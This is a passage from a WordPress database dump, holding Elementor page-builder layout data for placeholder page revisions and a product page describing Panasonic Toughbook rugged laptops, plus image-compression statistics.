Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3272,2587,'_wp_page_template','template-fullwidth.php'),(3270,2587,'_elementor_edit_mode','builder'),(3271,2587,'_elementor_template_type','post'),(3274,2587,'_elementor_version','0.4'),(3277,2588,'_elementor_edit_mode','builder'),(3278,2588,'_elementor_template_type','post'),(3279,2588,'_wp_page_template','template-fullwidth.php'),(3280,2588,'_elementor_data','[{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3281,2588,'_elementor_version','0.4'),(3284,2589,'_elementor_edit_mode','builder'),(3285,2589,'_elementor_template_type','post'),(3286,2589,'_wp_page_template','template-fullwidth.php'),(3287,2589,'_elementor_data','[{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3288,2589,'_elementor_version','0.4'),(4038,2726,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.89352710164862525488160827080719172954559326171875;s:5:\"bytes\";i:6916;s:11:\"size_before\";i:100326;s:10:\"size_after\";i:93410;s:4:\"time\";d:0.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.939999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:215;s:11:\"size_before\";i:11068;s:10:\"size_after\";i:10853;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.63999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:2045;s:11:\"size_before\";i:30813;s:10:\"size_after\";i:28768;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:1014;s:11:\"size_before\";i:18028;s:10:\"size_after\";i:17014;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3642;s:11:\"size_before\";i:40417;s:10:\"size_after\";i:36775;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(3291,2591,'_elementor_edit_mode','builder'),(3292,2591,'_elementor_template_type','post'),(3293,2591,'_wp_page_template','template-fullwidth.php'),(3294,2591,'_elementor_data','[{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Under Maintenance\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3295,2591,'_elementor_version','0.4'),(3315,2598,'_elementor_edit_mode','builder'),(3316,2598,'_elementor_template_type','post'),(3317,2598,'_wp_page_template','template-fullwidth.php'),(3318,2598,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, 